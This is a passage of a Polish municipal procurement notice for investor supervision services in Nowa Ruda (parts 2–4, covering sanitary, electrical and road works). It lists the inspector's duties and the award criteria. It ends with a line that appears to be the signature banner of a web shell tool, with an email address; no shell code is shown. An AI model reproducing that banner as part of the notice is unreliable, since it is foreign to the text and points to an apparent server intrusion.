robót, 9)rozwiązywanie problemów technicznych w trakcie realizacji inwestycji, 10)rzeczowe i finansowe rozliczenie robót budowlanych, 11)zatwierdzenie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną, 12)szacowanie i weryfikowanie oraz uzgadnianie z Zamawiającym robót dodatkowych, zamiennych, zaproponowanych przez Wykonawcę w zakresie rzeczowym i finansowym, 13) sporządzenie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, pisemne uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do Zamawiającego o ich akceptację, 14) organizacja oraz przeprowadzenie odbioru końcowego oraz przygotowanie protokołu odbioru w porozumieniu z Zamawiającym, 15) uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (min. raz do roku) po zakończeniu robót ), 16)zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami, 17)udział w weryfikacji harmonogramu rzeczowo-finansowego zadania i jego ewentualnych aktualizacji, 18)sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, w tym: a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy; b) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosownych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie; c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania; d)sprawdzenie i odbiór robót wynikających z harmonogramu robót budowlanych; e)kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowość ich wykonania; f)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilość, jakość, wartość robót), w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu; 19)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego; 20) branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania; 21)sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów, których oceny jakości dokonuje na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, Wykonawca ma obowiązek żądania od wykonawcy robót budowlanych odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie; 22)uczestniczenie w kontrolach przeprowadzonych przez Nadzór Budowlany i inne organy uprawione do kontroli oraz sprawdza realizację ustaleń i decyzji podjętych podczas tych kontroli; 23)uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją inwestycji w przypadku wystąpienia takiej potrzeby; 24)opiniowanie na wniosek Zamawiającego polisy ubezpieczeniowe Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ; 25)opiniowanie wniosków Wykonawcy o przesunięcie planowanego terminu zakończenia robót; 26)na wniosek Zamawiającego opracowywanie informacji z realizowanego zadania inwestycyjnego; 27)nadzorowanie skompletowania Operatu Kolaudacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. ilość proponowanych pobytów na budowie w tygodniu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> branża instalacje sanitarna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na kompleksowym pełnieniu nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane w latach 2016-2018 w zakresie: Zamawiający dopuszcza możliwości złożenia ofert częściowych dla 4 części. Część 1 -branża ogólnobudowlana Część 2 - branża instalacje sanitarna Część 3 - branża instalacje elektryczne Część 4 - branża drogowa UWAGI: Zamawiający informuje, że wartości planowanych w budżecie inwestycji Gminy Miejskiej Nowa Ruda do realizacji w latach 2016 - 2018 roku, wg uchwały w sprawie wieloletniego programu finansowania miasta Nowa Ruda, wynosi łącznie dla wszystkich przedsięwzięć- 44.263.314,00 zł brutto. Jednocześnie zamawiający informuje, że nie ma możliwości wskazania inwestycji jak i ich wartości z podziałem na poszczególne branże. Ponadto, zamawiający informuje, że ww. wartość służy wyłącznie celom pomocniczym i poglądowym, a wykonawca powinien we własnym zakresie przyjąć podstawy wyceny, tak aby zakres prac zawarty w wycenie - zapewniał wykonanie przedmiotu zamówienia w sposób określony w SIWZ. Do podstawowych obowiązków i czynności Inspektor Nadzoru w ramach przedmiotu zamówienia należy w szczególności: 1)pełnienie nadzoru zgodnie z obowiązująca ustawą z dnia 7 lipca 1994 r. Prawo budowlane, 2)sprawdzenie w terminie do 7 dni od otrzymania dokumentacji projektowej jej stanu, wskazania elementów dokumentacji wymagających poprawek oraz przydatność do wykonania przewidzianego zadania; 3)protokolarny odbiór dokumentacji projektowej, 4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji, 5)wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją inwestycji, 6)współpraca z nadzorem autorskim, 7)organizowanie i prowadzenie raz w tygodniu narad koordynacyjnych z udziałem wykonawcy, a także w zależności od potrzeb projektanta i przedstawicieli użytkownika, sporządza z nich protokoły z podjętymi ustaleniami i przekazuje je w formie elektronicznej (skan dokumentu) zainteresowanym stronom w terminie do 3 dni po naradzie (dotyczy Inspektora wiodącego dla danej inwestycji). 8)zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania robót, 9)rozwiązywanie problemów technicznych w trakcie realizacji inwestycji, 10)rzeczowe i finansowe rozliczenie robót budowlanych, 11)zatwierdzenie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną, 12)szacowanie i weryfikowanie oraz uzgadnianie z Zamawiającym robót dodatkowych, zamiennych, zaproponowanych przez Wykonawcę w zakresie rzeczowym i finansowym, 13) sporządzenie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, pisemne uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do Zamawiającego o ich akceptację, 14) organizacja oraz przeprowadzenie odbioru końcowego oraz przygotowanie protokołu odbioru w porozumieniu z Zamawiającym, 15) uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (min. raz do roku) po zakończeniu robót ), 16)zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami, 17)udział w weryfikacji harmonogramu rzeczowo-finansowego zadania i jego ewentualnych aktualizacji, 18)sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, w tym: a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy; b) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosownych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie; c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania; d)sprawdzenie i odbiór robót wynikających z harmonogramu robót budowlanych; e)kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowość ich wykonania; f)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilość, jakość, wartość robót), w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu; 19)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego; 20) branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania; 21)sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów, których oceny jakości dokonuje na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, Wykonawca ma obowiązek żądania od wykonawcy robót budowlanych odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie; 22)uczestniczenie w kontrolach przeprowadzonych przez Nadzór Budowlany i inne organy uprawione do kontroli oraz sprawdza realizację ustaleń i decyzji podjętych podczas tych kontroli; 23)uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją inwestycji w przypadku wystąpienia takiej potrzeby; 24)opiniowanie na wniosek Zamawiającego polisy ubezpieczeniowe Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ; 25)opiniowanie wniosków Wykonawcy o przesunięcie planowanego terminu zakończenia robót; 26)na wniosek Zamawiającego opracowywanie informacji z realizowanego zadania inwestycyjnego; 27)nadzorowanie skompletowania Operatu Kolaudacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. ilość proponowanych pobytów na budowie w tygodniu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> branża instalacje elektryczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na kompleksowym pełnieniu nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane w latach 2016-2018 w zakresie: Zamawiający dopuszcza możliwości złożenia ofert częściowych dla 4 części. Część 1 -branża ogólnobudowlana Część 2 - branża instalacje sanitarna Część 3 - branża instalacje elektryczne Część 4 - branża drogowa UWAGI: Zamawiający informuje, że wartości planowanych w budżecie inwestycji Gminy Miejskiej Nowa Ruda do realizacji w latach 2016 - 2018 roku, wg uchwały w sprawie wieloletniego programu finansowania miasta Nowa Ruda, wynosi łącznie dla wszystkich przedsięwzięć- 44.263.314,00 zł brutto. Jednocześnie zamawiający informuje, że nie ma możliwości wskazania inwestycji jak i ich wartości z podziałem na poszczególne branże. Ponadto, zamawiający informuje, że ww. wartość służy wyłącznie celom pomocniczym i poglądowym, a wykonawca powinien we własnym zakresie przyjąć podstawy wyceny, tak aby zakres prac zawarty w wycenie - zapewniał wykonanie przedmiotu zamówienia w sposób określony w SIWZ. Do podstawowych obowiązków i czynności Inspektor Nadzoru w ramach przedmiotu zamówienia należy w szczególności: 1)pełnienie nadzoru zgodnie z obowiązująca ustawą z dnia 7 lipca 1994 r. Prawo budowlane, 2)sprawdzenie w terminie do 7 dni od otrzymania dokumentacji projektowej jej stanu, wskazania elementów dokumentacji wymagających poprawek oraz przydatność do wykonania przewidzianego zadania; 3)protokolarny odbiór dokumentacji projektowej, 4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji, 5)wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją inwestycji, 6)współpraca z nadzorem autorskim, 7)organizowanie i prowadzenie raz w tygodniu narad koordynacyjnych z udziałem wykonawcy, a także w zależności od potrzeb projektanta i przedstawicieli użytkownika, sporządza z nich protokoły z podjętymi ustaleniami i przekazuje je w formie elektronicznej (skan dokumentu) zainteresowanym stronom w terminie do 3 dni po naradzie (dotyczy Inspektora wiodącego dla danej inwestycji). 8)zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania robót, 9)rozwiązywanie problemów technicznych w trakcie realizacji inwestycji, 10)rzeczowe i finansowe rozliczenie robót budowlanych, 11)zatwierdzenie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną, 12)szacowanie i weryfikowanie oraz uzgadnianie z Zamawiającym robót dodatkowych, zamiennych, zaproponowanych przez Wykonawcę w zakresie rzeczowym i finansowym, 13) sporządzenie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, pisemne uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do Zamawiającego o ich akceptację, 14) organizacja oraz przeprowadzenie odbioru końcowego oraz przygotowanie protokołu odbioru w porozumieniu z Zamawiającym, 15) uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (min. raz do roku) po zakończeniu robót ), 16)zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami, 17)udział w weryfikacji harmonogramu rzeczowo-finansowego zadania i jego ewentualnych aktualizacji, 18)sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, w tym: a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy; b) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosownych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie; c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania; d)sprawdzenie i odbiór robót wynikających z harmonogramu robót budowlanych; e)kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowość ich wykonania; f)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilość, jakość, wartość robót), w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu; 19)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego; 20) branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania; 21)sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów, których oceny jakości dokonuje na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, Wykonawca ma obowiązek żądania od wykonawcy robót budowlanych odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie; 22)uczestniczenie w kontrolach przeprowadzonych przez Nadzór Budowlany i inne organy uprawione do kontroli oraz sprawdza realizację ustaleń i decyzji podjętych podczas tych kontroli; 23)uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją inwestycji w przypadku wystąpienia takiej potrzeby; 24)opiniowanie na wniosek Zamawiającego polisy ubezpieczeniowe Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ; 25)opiniowanie wniosków Wykonawcy o przesunięcie planowanego terminu zakończenia robót; 26)na wniosek Zamawiającego opracowywanie informacji z realizowanego zadania inwestycyjnego; 27)nadzorowanie skompletowania Operatu Kolaudacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. ilość proponowanych pobytów na budowie w tygodniu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> branża drogowa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług polegających na kompleksowym pełnieniu nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, zgodnie z obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane w latach 2016-2018 w zakresie: Zamawiający dopuszcza możliwości złożenia ofert częściowych dla 4 części. Część 1 -branża ogólnobudowlana Część 2 - branża instalacje sanitarna Część 3 - branża instalacje elektryczne Część 4 - branża drogowa UWAGI: Zamawiający informuje, że wartości planowanych w budżecie inwestycji Gminy Miejskiej Nowa Ruda do realizacji w latach 2016 - 2018 roku, wg uchwały w sprawie wieloletniego programu finansowania miasta Nowa Ruda, wynosi łącznie dla wszystkich przedsięwzięć- 44.263.314,00 zł brutto. Jednocześnie zamawiający informuje, że nie ma możliwości wskazania inwestycji jak i ich wartości z podziałem na poszczególne branże. Ponadto, zamawiający informuje, że ww. wartość służy wyłącznie celom pomocniczym i poglądowym, a wykonawca powinien we własnym zakresie przyjąć podstawy wyceny, tak aby zakres prac zawarty w wycenie - zapewniał wykonanie przedmiotu zamówienia w sposób określony w SIWZ. Do podstawowych obowiązków i czynności Inspektor Nadzoru w ramach przedmiotu zamówienia należy w szczególności: 1)pełnienie nadzoru zgodnie z obowiązująca ustawą z dnia 7 lipca 1994 r. Prawo budowlane, 2)sprawdzenie w terminie do 7 dni od otrzymania dokumentacji projektowej jej stanu, wskazania elementów dokumentacji wymagających poprawek oraz przydatność do wykonania przewidzianego zadania; 3)protokolarny odbiór dokumentacji projektowej, 4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji, 5)wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją inwestycji, 6)współpraca z nadzorem autorskim, 7)organizowanie i prowadzenie raz w tygodniu narad koordynacyjnych z udziałem wykonawcy, a także w zależności od potrzeb projektanta i przedstawicieli użytkownika, sporządza z nich protokoły z podjętymi ustaleniami i przekazuje je w formie elektronicznej (skan dokumentu) zainteresowanym stronom w terminie do 3 dni po naradzie (dotyczy Inspektora wiodącego dla danej inwestycji). 8)zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami wykonania robót, 9)rozwiązywanie problemów technicznych w trakcie realizacji inwestycji, 10)rzeczowe i finansowe rozliczenie robót budowlanych, 11)zatwierdzenie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną, 12)szacowanie i weryfikowanie oraz uzgadnianie z Zamawiającym robót dodatkowych, zamiennych, zaproponowanych przez Wykonawcę w zakresie rzeczowym i finansowym, 13) sporządzenie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, pisemne uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do Zamawiającego o ich akceptację, 14) organizacja oraz przeprowadzenie odbioru końcowego oraz przygotowanie protokołu odbioru w porozumieniu z Zamawiającym, 15) uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót (min. raz do roku) po zakończeniu robót ), 16)zapoznanie się z terenem inwestycji, jego uzbrojeniem i istniejącymi urządzeniami, 17)udział w weryfikacji harmonogramu rzeczowo-finansowego zadania i jego ewentualnych aktualizacji, 18)sprawowanie kontroli w zakresie niezbędnym do zabezpieczenia interesów Zamawiającego, w tym: a)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej oraz zapisami umowy; b) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych i stosownych materiałów (do obowiązków inspektora będzie należało egzekwowanie i odbiór od wykonawcy robót atestów i certyfikatów wyrobów i materiałów przed ich wbudowaniem oraz ich szczegółowa weryfikacja), a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie; c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających , uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania; d)sprawdzenie i odbiór robót wynikających z harmonogramu robót budowlanych; e)kontrola ilości i wartości wykonywanych robót z obowiązującym harmonogramem oraz terminowość ich wykonania; f)kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót (ilość, jakość, wartość robót), w czasie każdorazowego pobytu na budowie inspektor nadzoru ma obowiązek bieżącego przeglądu dziennika budowy oraz potwierdzenia bytności poprzez dokonanie stosownego zapisu; 19)rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego; 20) branie udziału w komisjach technicznych powołanych do oceny lub rozstrzygnięcia spraw budowy w toku jej trwania; 21)sprawdzanie posiadania przez kierownika budowy odpowiednich dokumentów (atestów, świadectw jakości, wyników badań), dotyczących elementów prefabrykowanych i innych wyrobów, których oceny jakości dokonuje na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania, Wykonawca ma obowiązek żądania od wykonawcy robót budowlanych odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym powiadomieniem Inwestora o zaistniałym fakcie; 22)uczestniczenie w kontrolach przeprowadzonych przez Nadzór Budowlany i inne organy uprawione do kontroli oraz sprawdza realizację ustaleń i decyzji podjętych podczas tych kontroli; 23)uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją inwestycji w przypadku wystąpienia takiej potrzeby; 24)opiniowanie na wniosek Zamawiającego polisy ubezpieczeniowe Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ; 25)opiniowanie wniosków Wykonawcy o przesunięcie planowanego terminu zakończenia robót; 26)na wniosek Zamawiającego opracowywanie informacji z realizowanego zadania inwestycyjnego; 27)nadzorowanie skompletowania Operatu Kolaudacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. ilość proponowanych pobytów na budowie w tygodniu - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com